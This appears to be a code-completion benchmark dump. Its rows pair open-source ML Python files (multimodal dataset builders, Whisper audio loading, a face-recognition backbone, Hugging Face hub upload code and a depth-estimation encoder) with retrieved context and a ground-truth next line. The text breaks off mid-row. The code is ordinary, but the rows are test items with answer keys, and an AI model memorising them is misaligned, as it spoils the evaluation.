repo_name (string, lengths 7-71) | file_path (string, lengths 5-118) | context (list) | import_statement (string, lengths 45-12.5k) | token_num (int64, 641-99.4k) | cropped_code (string, lengths 44-17k) | all_code (string, lengths 43-754k) | next_line (string, lengths 2-330) | gold_snippet_index (int64, 0-68) | created_at (string, lengths 25-25) | level (string, 9 classes) |
---|---|---|---|---|---|---|---|---|---|---|
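Each row below follows the column schema above. As a rough illustration only (the field meanings are inferred from the header and the sample rows, and the type names are not part of the dump), one row can be modeled like this:

```python
from typing import List, TypedDict

class ContextSnippet(TypedDict):
    identifier: str  # name of the referenced symbol, e.g. "ConcatDataset"
    path: str        # file in the repository that defines it
    snippet: str     # source text of that definition

class Row(TypedDict):
    repo_name: str                 # e.g. "OPPOMKLab/u-LLaVA"
    file_path: str                 # file being completed
    context: List[ContextSnippet]  # retrieved cross-file definitions
    import_statement: str          # import block of the target file
    token_num: int                 # approximate prompt size in tokens
    cropped_code: str              # code preceding the line to predict
    all_code: str                  # full file contents
    next_line: str                 # ground-truth completion line
    gold_snippet_index: int        # index into `context` of the snippet the next line relies on
    created_at: str                # commit timestamp
    level: str                     # length bucket, e.g. "2k"
```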
OPPOMKLab/u-LLaVA | tasks/image_text_pretrain.py | [
{
"identifier": "registry",
"path": "utils/registry.py",
"snippet": "class Registry:\n def register_builder(cls, name):\n def wrap(builder_cls):\n def register_model(cls, name):\n def wrap(model_cls):\n def register_processor(cls, name):\n def wrap(processor_cls):\n def register_collator(cls, name):\n def wrap(collator_cls):\n def register_task(cls, name):\n def wrap(task_cls):\n def register(cls, name, obj):\n def get_builder_class(cls, name):\n def get_model_class(cls, name):\n def get_processor_class(cls, name):\n def get_collator_class(cls, name):\n def get_task_class(cls, name):\n def list_models(cls):\n def list_processors(cls):\n def list_collators(cls):\n def list_builders(cls):\n def list_tasks(cls):\n def get_path(cls, name):\n def get(cls, name, default=None, no_warning=False):\n def unregister(cls, name):"
},
{
"identifier": "BaseTask",
"path": "tasks/base_task.py",
"snippet": "class BaseTask:\n def __init__(self, cfg):\n self.cfg = cfg\n\n @staticmethod\n def build_model(model_cfg):\n model_cls = registry.get_model_class(model_cfg.arch)\n return model_cls.from_config(model_cfg)\n\n def build_collator(self, pad_token_id):\n \"\"\"\n :param pad_token_id: tokenizer.pad_token_id\n :return: data collator\n \"\"\"\n collator_type = self.cfg.get('collator_type', 'base_collator')\n data_collator = registry.get_collator_class(collator_type)(pad_token_id)\n return data_collator\n\n @staticmethod\n def build_processors(processors_cfg):\n \"\"\"\n :param processors_cfg:\n processor:\n clip_image:\n path:\n image_size: 224\n video_train:\n n_frm: 8\n image_size: 224\n gif_train:\n n_frm: 8\n image_size: 224\n plain_box:\n precision: 3\n :return:\n \"\"\"\n processors = dict()\n for idx, name in enumerate(processors_cfg):\n datetime_print('BUILDING PROCESSOR {0}: {1}'.format(idx + 1, name))\n processor_cfg = processors_cfg[name]\n processor = registry.get_processor_class(name).from_config(processor_cfg)\n processors[name] = processor\n\n return processors\n\n @staticmethod\n def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):\n \"\"\"\n Build a dictionary of datasets, keyed by split 'train', 'valid', 'test'.\n\n :param datasets_config:\n dataset_1\n image_dir\n dataset_2\n image_dir\n :param tokenizer:\n :param processor_dict: {'clip_image': CLIPImageProcessor()}\n :param conv_type: 'conv_simple'\n Returns:\n Dictionary of torch.utils.data.Dataset objects by split.\n\n datasets: {\n 'llava_instruct': {'train': dataset, 'test': dataset},\n 'para_instruct': {'train': dataset, 'test': dataset}\n }\n \"\"\"\n datasets = dict()\n\n assert len(datasets_config) > 0, \"At least one dataset has to be specified.\"\n\n for name in datasets_config:\n dataset_config = datasets_config[name]\n\n builder = registry.get_builder_class(name)(dataset_config)\n dataset = builder.build(tokenizer, processor_dict, conv_type)\n\n datasets[name] = dataset\n\n return datasets"
},
{
"identifier": "datetime_print",
"path": "utils/tools.py",
"snippet": "def datetime_print(msg):\n print('[' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S,%f\")[:-3] + '] ' + msg)"
},
{
"identifier": "ConcatDataset",
"path": "datasets/datasets/concat_dataset.py",
"snippet": "class ConcatDataset(Dataset):\n\n def __init__(self, datasets: Sequence[BaseDataset]):\n self.concat_dataset = TorchConcatDataset(datasets)\n\n def __len__(self):\n return len(self.concat_dataset)\n\n def __getitem__(self, index):\n return self.concat_dataset[index]"
},
{
"identifier": "ConcatDatasetWithShuffle",
"path": "datasets/datasets/concat_dataset.py",
"snippet": "class ConcatDatasetWithShuffle(Subset):\n def __init__(self, datasets: Sequence[BaseDataset],\n seed=42,\n portion=1):\n self.seed = seed\n self.portion = portion\n\n dataset = TorchConcatDataset(datasets)\n target_len = int(len(dataset) * portion)\n indices = list(range(len(dataset))) * int(np.ceil(portion))\n rng = np.random.default_rng(seed)\n rng.shuffle(indices)\n indices = indices[:target_len]\n super().__init__(dataset, indices)"
}
] | from utils.registry import registry
from tasks.base_task import BaseTask
from utils.tools import datetime_print
from datasets.datasets.concat_dataset import ConcatDataset, ConcatDatasetWithShuffle | 1,500 | """
Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py
"""
@registry.register_task("image_text_pretrain")
class ImageTextPretrainTask(BaseTask):
def __init__(self, cfg):
super().__init__(cfg)
@staticmethod
def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):
"""
:param datasets_config:
:param tokenizer:
:param processor_dict: {'clip_image': CLIPImageProcessor()}
:param conv_type:
:return:
"""
assert len(datasets_config) > 0, "At least one dataset has to be specified."
if len(datasets_config) == 1:
name = list(datasets_config.keys())[0]
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
# {"train": dataset, "test": dataset}
dataset = builder.build(tokenizer, processor_dict, conv_type)
else:
shuffle = True
portion = 1
dataset_list = []
for idx, name in enumerate(datasets_config):
datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name))
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
current_dataset = builder.build(tokenizer, processor_dict, conv_type)
dataset_list.append(current_dataset)
if shuffle:
dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion)
else:
| """
Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py
"""
@registry.register_task("image_text_pretrain")
class ImageTextPretrainTask(BaseTask):
def __init__(self, cfg):
super().__init__(cfg)
@staticmethod
def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'):
"""
:param datasets_config:
:param tokenizer:
:param processor_dict: {'clip_image': CLIPImageProcessor()}
:param conv_type:
:return:
"""
assert len(datasets_config) > 0, "At least one dataset has to be specified."
if len(datasets_config) == 1:
name = list(datasets_config.keys())[0]
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
# {"train": dataset, "test": dataset}
dataset = builder.build(tokenizer, processor_dict, conv_type)
else:
shuffle = True
portion = 1
dataset_list = []
for idx, name in enumerate(datasets_config):
datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name))
dataset_config = datasets_config[name]
builder = registry.get_builder_class(name)(dataset_config)
current_dataset = builder.build(tokenizer, processor_dict, conv_type)
dataset_list.append(current_dataset)
if shuffle:
dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion)
else: | dataset = ConcatDataset(dataset_list) | 3 | 2023-12-21 08:10:23+00:00 | 2k |
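The first row illustrates the task format: the context snippets, the import block, and the cropped code form the model input, and `next_line` (`dataset = ConcatDataset(dataset_list)`) is the target, while `gold_snippet_index` 3 points at the `ConcatDataset` entry in `context`. A minimal prompt-assembly sketch under that reading (the function name and formatting are illustrative, not prescribed by the data):

```python
def build_prompt(row: Row) -> str:
    """Concatenate retrieved snippets, the import block, and the cropped file body."""
    context_block = "\n\n".join(
        f"# {c['path']} :: {c['identifier']}\n{c['snippet']}" for c in row["context"]
    )
    return f"{context_block}\n\n{row['import_statement']}\n{row['cropped_code']}"

# A model completing this prompt should emit the stored target, e.g. for the row above:
# row["next_line"] == "dataset = ConcatDataset(dataset_list)"
```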
shashikg/WhisperS2T | whisper_s2t/data.py | [
{
"identifier": "pad_or_trim",
"path": "whisper_s2t/audio.py",
"snippet": "def pad_or_trim(array, length: int = N_SAMPLES, *, axis: int = -1):\n \"\"\"\n Pad or trim the audio array to N_SAMPLES, as expected by the encoder.\n \"\"\"\n \n if torch.is_tensor(array):\n if array.shape[axis] > length:\n array = array.index_select(\n dim=axis, index=torch.arange(length, device=array.device)\n )\n\n if array.shape[axis] < length:\n pad_widths = [(0, 0)] * array.ndim\n pad_widths[axis] = (0, length - array.shape[axis])\n array = F.pad(array, [pad for sizes in pad_widths[::-1] for pad in sizes])\n else:\n if array.shape[axis] > length:\n array = array.take(indices=range(length), axis=axis)\n\n if array.shape[axis] < length:\n pad_widths = [(0, 0)] * array.ndim\n pad_widths[axis] = (0, length - array.shape[axis])\n array = np.pad(array, pad_widths)\n \n return array"
},
{
"identifier": "audio_batch_generator",
"path": "whisper_s2t/audio.py",
"snippet": "def audio_batch_generator(audio_files):\n return THREAD_POOL_AUDIO_LOADER.imap(load_audio, audio_files)"
},
{
"identifier": "load_audio",
"path": "whisper_s2t/audio.py",
"snippet": "def load_audio(input_file, sr=16000, return_duration=False):\n \n try:\n with wave.open(input_file, 'rb') as wf:\n if (wf.getframerate() != sr) or (wf.getnchannels() != 1):\n raise Exception(\"Not a 16kHz wav mono channel file!\")\n \n frames = wf.getnframes()\n x = wf.readframes(int(frames))\n except:\n with tempfile.TemporaryDirectory() as tmpdir:\n wav_file = f\"{tmpdir}/tmp.wav\"\n ret_code = os.system(f'ffmpeg -hide_banner -loglevel panic -i {input_file} -threads 1 -acodec pcm_s16le -ac 1 -af aresample=resampler={RESAMPLING_ENGINE} -ar {sr} {wav_file} -y')\n if ret_code != 0: raise RuntimeError(\"ffmpeg failed to resample the input audio file, make sure ffmpeg is compiled properly!\")\n \n with wave.open(wav_file, 'rb') as wf:\n frames = wf.getnframes()\n x = wf.readframes(int(frames))\n \n audio_signal = np.frombuffer(x, np.int16).flatten().astype(np.float32)/32768.0\n audio_duration = len(audio_signal)/sr\n \n if return_duration:\n return audio_signal, audio_duration\n else:\n return audio_signal"
}
] | import torch
import numpy as np
from tqdm import tqdm
from .configs import *
from .audio import pad_or_trim, audio_batch_generator, load_audio | 1,229 |
def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None):
speech_duration = [end - start for start, end in start_ends]
stitched_speech_segments = []
curr_seg = [0]
curr_dur = speech_duration[0]
idx = 1
while idx < len(start_ends):
if curr_dur + speech_duration[idx] > max_len:
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
curr_seg = [idx]
curr_dur = speech_duration[idx]
else:
curr_dur += speech_duration[idx]
curr_seg.append(idx)
idx += 1
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
if max_silent_region is None:
return stitched_speech_segments
stitched_speech_segments_joined = []
for segs in stitched_speech_segments:
_segs = []
curr_seg_start_time, curr_seg_end_time = segs[0]
for i in range(1, len(segs)):
if (segs[i][0] - curr_seg_end_time) >= max_silent_region:
_segs.append((curr_seg_start_time, curr_seg_end_time))
curr_seg_start_time = segs[i][0]
curr_seg_end_time = segs[i][1]
_segs.append((curr_seg_start_time, curr_seg_end_time))
stitched_speech_segments_joined.append(_segs)
return stitched_speech_segments_joined
class WhisperDataset(torch.utils.data.Dataset):
def __init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len,
device="cuda",
dta_padding=48000,
without_timestamps=True,
use_dynamic_time_axis=False):
self.audio_files = audio_files
self.lang_codes = lang_codes
self.tasks = tasks
self.initial_prompts = initial_prompts
self.tokenizer = tokenizer
self.device = device
self.dta_padding = dta_padding
self.without_timestamps = without_timestamps
self.use_dynamic_time_axis = use_dynamic_time_axis
self.max_initial_prompt_len = max_initial_prompt_len
if type(audio_files[0]) == str:
self.get_audio_signal = self._get_audio_signal_from_file
else:
self.get_audio_signal = self._get_audio_signal_from_array
def _get_audio_signal_from_array(self, item):
return self.audio_files[item]
def _get_audio_signal_from_file(self, item):
|
def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None):
speech_duration = [end - start for start, end in start_ends]
stitched_speech_segments = []
curr_seg = [0]
curr_dur = speech_duration[0]
idx = 1
while idx < len(start_ends):
if curr_dur + speech_duration[idx] > max_len:
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
curr_seg = [idx]
curr_dur = speech_duration[idx]
else:
curr_dur += speech_duration[idx]
curr_seg.append(idx)
idx += 1
stitched_speech_segments.append([start_ends[_] for _ in curr_seg])
if max_silent_region is None:
return stitched_speech_segments
stitched_speech_segments_joined = []
for segs in stitched_speech_segments:
_segs = []
curr_seg_start_time, curr_seg_end_time = segs[0]
for i in range(1, len(segs)):
if (segs[i][0] - curr_seg_end_time) >= max_silent_region:
_segs.append((curr_seg_start_time, curr_seg_end_time))
curr_seg_start_time = segs[i][0]
curr_seg_end_time = segs[i][1]
_segs.append((curr_seg_start_time, curr_seg_end_time))
stitched_speech_segments_joined.append(_segs)
return stitched_speech_segments_joined
class WhisperDataset(torch.utils.data.Dataset):
def __init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len,
device="cuda",
dta_padding=48000,
without_timestamps=True,
use_dynamic_time_axis=False):
self.audio_files = audio_files
self.lang_codes = lang_codes
self.tasks = tasks
self.initial_prompts = initial_prompts
self.tokenizer = tokenizer
self.device = device
self.dta_padding = dta_padding
self.without_timestamps = without_timestamps
self.use_dynamic_time_axis = use_dynamic_time_axis
self.max_initial_prompt_len = max_initial_prompt_len
if type(audio_files[0]) == str:
self.get_audio_signal = self._get_audio_signal_from_file
else:
self.get_audio_signal = self._get_audio_signal_from_array
def _get_audio_signal_from_array(self, item):
return self.audio_files[item]
def _get_audio_signal_from_file(self, item): | return load_audio(self.audio_files[item]) | 2 | 2023-12-16 18:09:16+00:00 | 2k |
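Predictions on rows like the two above are naturally compared against `next_line`. The dump itself does not prescribe a metric; a simple whitespace-insensitive exact-match check, as a sketch, could look like this:

```python
def exact_match(prediction: str, row: Row) -> bool:
    """Compare a predicted line with the stored next_line, ignoring surrounding whitespace."""
    return prediction.strip() == row["next_line"].strip()

def accuracy(predictions: List[str], rows: List[Row]) -> float:
    hits = sum(exact_match(p, r) for p, r in zip(predictions, rows))
    return hits / max(len(rows), 1)
```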
chinhsuanwu/ifusion | ldm/thirdp/psp/model_irse.py | [
{
"identifier": "get_blocks",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "def get_blocks(num_layers):\n\tif num_layers == 50:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=4),\n\t\t\tget_block(in_channel=128, depth=256, num_units=14),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telif num_layers == 100:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=13),\n\t\t\tget_block(in_channel=128, depth=256, num_units=30),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telif num_layers == 152:\n\t\tblocks = [\n\t\t\tget_block(in_channel=64, depth=64, num_units=3),\n\t\t\tget_block(in_channel=64, depth=128, num_units=8),\n\t\t\tget_block(in_channel=128, depth=256, num_units=36),\n\t\t\tget_block(in_channel=256, depth=512, num_units=3)\n\t\t]\n\telse:\n\t\traise ValueError(\"Invalid number of layers: {}. Must be one of [50, 100, 152]\".format(num_layers))\n\treturn blocks"
},
{
"identifier": "Flatten",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class Flatten(Module):\n\tdef forward(self, input):\n\t\treturn input.view(input.size(0), -1)"
},
{
"identifier": "bottleneck_IR",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class bottleneck_IR(Module):\n\tdef __init__(self, in_channel, depth, stride):\n\t\tsuper(bottleneck_IR, self).__init__()\n\t\tif in_channel == depth:\n\t\t\tself.shortcut_layer = MaxPool2d(1, stride)\n\t\telse:\n\t\t\tself.shortcut_layer = Sequential(\n\t\t\t\tConv2d(in_channel, depth, (1, 1), stride, bias=False),\n\t\t\t\tBatchNorm2d(depth)\n\t\t\t)\n\t\tself.res_layer = Sequential(\n\t\t\tBatchNorm2d(in_channel),\n\t\t\tConv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth),\n\t\t\tConv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth)\n\t\t)\n\n\tdef forward(self, x):\n\t\tshortcut = self.shortcut_layer(x)\n\t\tres = self.res_layer(x)\n\t\treturn res + shortcut"
},
{
"identifier": "bottleneck_IR_SE",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "class bottleneck_IR_SE(Module):\n\tdef __init__(self, in_channel, depth, stride):\n\t\tsuper(bottleneck_IR_SE, self).__init__()\n\t\tif in_channel == depth:\n\t\t\tself.shortcut_layer = MaxPool2d(1, stride)\n\t\telse:\n\t\t\tself.shortcut_layer = Sequential(\n\t\t\t\tConv2d(in_channel, depth, (1, 1), stride, bias=False),\n\t\t\t\tBatchNorm2d(depth)\n\t\t\t)\n\t\tself.res_layer = Sequential(\n\t\t\tBatchNorm2d(in_channel),\n\t\t\tConv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),\n\t\t\tPReLU(depth),\n\t\t\tConv2d(depth, depth, (3, 3), stride, 1, bias=False),\n\t\t\tBatchNorm2d(depth),\n\t\t\tSEModule(depth, 16)\n\t\t)\n\n\tdef forward(self, x):\n\t\tshortcut = self.shortcut_layer(x)\n\t\tres = self.res_layer(x)\n\t\treturn res + shortcut"
},
{
"identifier": "l2_norm",
"path": "ldm/thirdp/psp/helpers.py",
"snippet": "def l2_norm(input, axis=1):\n\tnorm = torch.norm(input, 2, axis, True)\n\toutput = torch.div(input, norm)\n\treturn output"
}
] | from torch.nn import (
Linear,
Conv2d,
BatchNorm1d,
BatchNorm2d,
PReLU,
Dropout,
Sequential,
Module,
)
from ldm.thirdp.psp.helpers import (
get_blocks,
Flatten,
bottleneck_IR,
bottleneck_IR_SE,
l2_norm,
) | 1,202 | # https://github.com/eladrich/pixel2style2pixel
"""
Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch)
"""
class Backbone(Module):
def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True):
super(Backbone, self).__init__()
assert input_size in [112, 224], "input_size should be 112 or 224"
assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152"
assert mode in ["ir", "ir_se"], "mode should be ir or ir_se"
blocks = get_blocks(num_layers)
if mode == "ir":
unit_module = bottleneck_IR
elif mode == "ir_se":
| # https://github.com/eladrich/pixel2style2pixel
"""
Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch)
"""
class Backbone(Module):
def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True):
super(Backbone, self).__init__()
assert input_size in [112, 224], "input_size should be 112 or 224"
assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152"
assert mode in ["ir", "ir_se"], "mode should be ir or ir_se"
blocks = get_blocks(num_layers)
if mode == "ir":
unit_module = bottleneck_IR
elif mode == "ir_se": | unit_module = bottleneck_IR_SE | 3 | 2023-12-17 12:45:38+00:00 | 2k |
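The `gold_snippet_index` column is consistent across these sample rows: row 1 has index 3 and its `next_line` calls `ConcatDataset`, the fourth context entry, and this row also has index 3 with `next_line` using `bottleneck_IR_SE`, again the fourth entry. A small sanity-check sketch of that relationship, using only the fields shown above:

```python
def gold_snippet_is_used(row: Row) -> bool:
    """Check that the identifier of the gold context snippet appears in the target line."""
    gold = row["context"][row["gold_snippet_index"]]
    return gold["identifier"] in row["next_line"]
```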
wangzhecheng/SkyScript | src/open_clip/push_to_hf_hub.py | [
{
"identifier": "create_model_from_pretrained",
"path": "src/open_clip/factory.py",
"snippet": "def create_model_from_pretrained(\n model_name: str,\n pretrained: Optional[str] = None,\n precision: str = 'fp32',\n device: Union[str, torch.device] = 'cpu',\n jit: bool = False,\n force_quick_gelu: bool = False,\n force_custom_text: bool = False,\n force_image_size: Optional[Union[int, Tuple[int, int]]] = None,\n return_transform: bool = True,\n image_mean: Optional[Tuple[float, ...]] = None,\n image_std: Optional[Tuple[float, ...]] = None,\n cache_dir: Optional[str] = None,\n):\n model = create_model(\n model_name,\n pretrained,\n precision=precision,\n device=device,\n jit=jit,\n force_quick_gelu=force_quick_gelu,\n force_custom_text=force_custom_text,\n force_image_size=force_image_size,\n cache_dir=cache_dir,\n require_pretrained=True,\n )\n\n if not return_transform:\n return model\n\n image_mean = image_mean or getattr(model.visual, 'image_mean', None)\n image_std = image_std or getattr(model.visual, 'image_std', None)\n preprocess = image_transform(\n model.visual.image_size,\n is_train=False,\n mean=image_mean,\n std=image_std,\n )\n\n return model, preprocess"
},
{
"identifier": "get_model_config",
"path": "src/open_clip/factory.py",
"snippet": "def get_model_config(model_name):\n if model_name in _MODEL_CONFIGS:\n return deepcopy(_MODEL_CONFIGS[model_name])\n else:\n return None"
},
{
"identifier": "get_tokenizer",
"path": "src/open_clip/factory.py",
"snippet": "def get_tokenizer(model_name):\n if model_name.startswith(HF_HUB_PREFIX):\n tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):])\n else:\n config = get_model_config(model_name)\n tokenizer = HFTokenizer(\n config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize\n return tokenizer"
},
{
"identifier": "HFTokenizer",
"path": "src/open_clip/tokenizer.py",
"snippet": "class HFTokenizer:\n \"\"\"HuggingFace tokenizer wrapper\"\"\"\n\n def __init__(self, tokenizer_name: str):\n from transformers import AutoTokenizer\n self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)\n\n def save_pretrained(self, dest):\n self.tokenizer.save_pretrained(dest)\n\n def __call__(self, texts: Union[str, List[str]], context_length: int = 77) -> torch.Tensor:\n # same cleaning as for default tokenizer, except lowercasing\n # adding lower (for case-sensitive tokenizers) will make it more robust but less sensitive to nuance\n if isinstance(texts, str):\n texts = [texts]\n texts = [whitespace_clean(basic_clean(text)) for text in texts]\n input_ids = self.tokenizer(\n texts,\n return_tensors='pt',\n max_length=context_length,\n padding='max_length',\n truncation=True,\n ).input_ids\n return input_ids"
}
] | import argparse
import json
import os
import torch
import safetensors.torch
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Optional, Tuple, Union
from huggingface_hub import (
create_repo,
get_hf_file_metadata,
hf_hub_download,
hf_hub_url,
repo_type_and_id_from_hf_id,
upload_folder,
list_repo_files,
)
from huggingface_hub.utils import EntryNotFoundError
from .factory import create_model_from_pretrained, get_model_config, get_tokenizer
from .tokenizer import HFTokenizer | 1,172 | """
Adapted from https://github.com/mlfoundations/open_clip. Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt
"""
try:
_has_hf_hub = True
except ImportError:
_has_hf_hub = False
try:
_has_safetensors = True
except ImportError:
_has_safetensors = False
# Default name for a weights file hosted on the Huggingface Hub.
HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl
HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version
HF_CONFIG_NAME = 'open_clip_config.json'
def save_config_for_hf(
model,
config_path: str,
model_config: Optional[dict]
):
preprocess_cfg = {
'mean': model.visual.image_mean,
'std': model.visual.image_std,
}
hf_config = {
'model_cfg': model_config,
'preprocess_cfg': preprocess_cfg,
}
with config_path.open('w') as f:
json.dump(hf_config, f, indent=2)
def save_for_hf(
model,
| """
Adapted from https://github.com/mlfoundations/open_clip. Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt
"""
try:
_has_hf_hub = True
except ImportError:
_has_hf_hub = False
try:
_has_safetensors = True
except ImportError:
_has_safetensors = False
# Default name for a weights file hosted on the Huggingface Hub.
HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl
HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version
HF_CONFIG_NAME = 'open_clip_config.json'
def save_config_for_hf(
model,
config_path: str,
model_config: Optional[dict]
):
preprocess_cfg = {
'mean': model.visual.image_mean,
'std': model.visual.image_std,
}
hf_config = {
'model_cfg': model_config,
'preprocess_cfg': preprocess_cfg,
}
with config_path.open('w') as f:
json.dump(hf_config, f, indent=2)
def save_for_hf(
model, | tokenizer: HFTokenizer, | 3 | 2023-12-19 11:50:56+00:00 | 2k |
Lavreniuk/EVP | depth/models_depth/model_vpd.py | [
{
"identifier": "UNetWrapper",
"path": "evp/models.py",
"snippet": "class UNetWrapper(nn.Module):\n def __init__(self, unet, use_attn=True, base_size=512, max_attn_size=None, attn_selector='up_cross+down_cross') -> None:\n super().__init__()\n self.unet = unet\n self.attention_store = AttentionStore(base_size=base_size // 8, max_size=max_attn_size)\n self.size16 = base_size // 32\n self.size32 = base_size // 16\n self.size64 = base_size // 8\n self.use_attn = use_attn\n if self.use_attn:\n register_attention_control(unet, self.attention_store)\n register_hier_output(unet)\n self.attn_selector = attn_selector.split('+')\n\n def forward(self, *args, **kwargs):\n if self.use_attn:\n self.attention_store.reset()\n out_list = self.unet(*args, **kwargs)\n if self.use_attn:\n avg_attn = self.attention_store.get_average_attention()\n attn16, attn32, attn64 = self.process_attn(avg_attn)\n out_list[1] = torch.cat([out_list[1], attn16], dim=1)\n out_list[2] = torch.cat([out_list[2], attn32], dim=1)\n if attn64 is not None:\n out_list[3] = torch.cat([out_list[3], attn64], dim=1)\n return out_list[::-1]\n\n def process_attn(self, avg_attn):\n attns = {self.size16: [], self.size32: [], self.size64: []}\n for k in self.attn_selector:\n for up_attn in avg_attn[k]:\n size = int(math.sqrt(up_attn.shape[1]))\n attns[size].append(rearrange(up_attn, 'b (h w) c -> b c h w', h=size))\n attn16 = torch.stack(attns[self.size16]).mean(0)\n attn32 = torch.stack(attns[self.size32]).mean(0)\n if len(attns[self.size64]) > 0:\n attn64 = torch.stack(attns[self.size64]).mean(0)\n else:\n attn64 = None\n return attn16, attn32, attn64"
},
{
"identifier": "TextAdapterDepth",
"path": "evp/models.py",
"snippet": "class TextAdapterDepth(nn.Module):\n def __init__(self, text_dim=768):\n super().__init__()\n \n self.fc = nn.Sequential(\n nn.Linear(text_dim, text_dim),\n nn.GELU(),\n nn.Linear(text_dim, text_dim)\n )\n\n def forward(self, latents, texts, gamma):\n # use the gamma to blend\n n_sen, channel = texts.shape\n bs = latents.shape[0]\n\n texts_after = self.fc(texts)\n texts = texts + gamma * texts_after\n texts = repeat(texts, 'n c -> n b c', b=1)\n return texts"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from timm.models.layers import trunc_normal_, DropPath
from mmcv.cnn import (build_conv_layer, build_norm_layer, build_upsample_layer,
constant_init, normal_init)
from omegaconf import OmegaConf
from ldm.util import instantiate_from_config
from evp.models import UNetWrapper, TextAdapterDepth | 1,279 | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# The deconvolution code is based on Simple Baseline.
# (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py)
# Modified by Zigang Geng ([email protected]).
# ------------------------------------------------------------------------------
class VPDDepthEncoder(nn.Module):
def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768,
dataset='nyu'
):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
nn.GroupNorm(16, ldm_prior[0]),
nn.ReLU(),
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
)
self.layer2 = nn.Sequential(
nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1),
)
self.out_layer = nn.Sequential(
nn.Conv2d(sum(ldm_prior), out_dim, 1),
nn.GroupNorm(16, out_dim),
nn.ReLU(),
)
self.apply(self._init_weights)
### stable diffusion layers
config = OmegaConf.load('./v1-inference.yaml')
if sd_path is None:
config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt'
else:
config.model.params.ckpt_path = f'../{sd_path}'
sd_model = instantiate_from_config(config.model)
self.encoder_vq = sd_model.first_stage_model
self.unet = UNetWrapper(sd_model.model, use_attn=False)
del sd_model.cond_stage_model
del self.encoder_vq.decoder
del self.unet.unet.diffusion_model.out
for param in self.encoder_vq.parameters():
param.requires_grad = False
if dataset == 'nyu':
| # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# The deconvolution code is based on Simple Baseline.
# (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py)
# Modified by Zigang Geng ([email protected]).
# ------------------------------------------------------------------------------
class VPDDepthEncoder(nn.Module):
def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768,
dataset='nyu'
):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
nn.GroupNorm(16, ldm_prior[0]),
nn.ReLU(),
